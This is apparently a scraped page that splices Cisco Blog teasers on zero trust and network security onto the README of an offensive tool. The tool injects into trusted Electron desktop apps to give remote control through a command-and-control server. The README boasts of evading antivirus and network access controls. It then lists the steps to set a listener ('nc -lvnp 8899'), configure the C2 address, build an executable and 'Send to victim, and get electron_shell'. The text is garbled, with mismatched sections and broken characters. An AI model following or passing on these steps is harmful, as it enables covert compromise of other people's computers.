Login
There has been an exponential increase in breaches within enterprises despite the carefully constructed and controlled perimeters that exist around applications and data. Once an attacker can accessโฆ Read more on Cisco Blogs
Zero Trust Network Access (ZTNA) is a critical component to increase productivity and reduce risk in todayโs hyper-distributed environments. Cisco Secure Access provides a modern form of zero trust aโฆ Read more on Cisco Blogs
In January 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued a directive (with an update in February) mandating that all U.S. Federal agencies take Ivanti systems offlineโฆ Read more on Cisco Blogs
The proliferation of applications across hybrid and multicloud environments continues at a blistering pace. For the most part, there is no fixed perimeter, applications and environments are wovenโฆ Read more on Cisco Blogs
Security service edge (SSE) technology was created to protect remote and branch users with a unified, cloud-delivered security stack. To understand how SSE solutions protect organizations and theirโฆ Read more on Cisco Blogs
Zero Trust has been all the rage for several years; it states, โnever trust, always verifyโ and assumes every attempt to access the network or aโฆ Read more on Cisco Blogs
Since the European Union (EU) signed the second version of the Network and Information Security (NIS2) Directive in December 2022, there has been a real frenzy all around Europe about it. NIS2 is nowโฆ Read more on Cisco Blogs
Supports almost all operating systems
Supports almost all desktop applications developed based on Electron
๏จ All malicious operations are executed by the injected program, those commonly used trusted programs
Bypass of Network Access Control Policy for Applications by Zero Trust Sandbox
Verified that it will not be discovered by the antivirus software below
(Please note that a simple command call has been implemented here, and some behavior based heuristic checks will still prompt , bypass AV is not a key issue to be addressed in this project)
An increasing number of desktop applications are opting for the Electron framework.
Electron provides a method that can be debugged, usually by utilizing Chrome's inspect function or calling inspect through Node.js. In this project, the implementation of inspect was analyzed, and a method for automatically parasitizing common Electron programs was developed.
By establishing a connection with the Command and Control (C2) server, a simple remote control is achieved.
Due to the widespread trust of most antivirus software in these well-known applications (with digital signatures), executing malicious commands in the program context provides excellent concealment and stability.
For these injected applications, it is necessary to carefully consider the potential legal risks brought by such actions. When users analyze program behavior, they may be surprised to find that the parent process executing malicious behavior comes from the application they trust.
FreshRSS 
nc -lvnp 8899
clone this project
modify build.config
injected_app: The electron program you want to inject
c2: set c2_Public IP and c2_netcat Port
exec node build.js, and then pkg to an execute program
Send to victim, and get electron_shellย
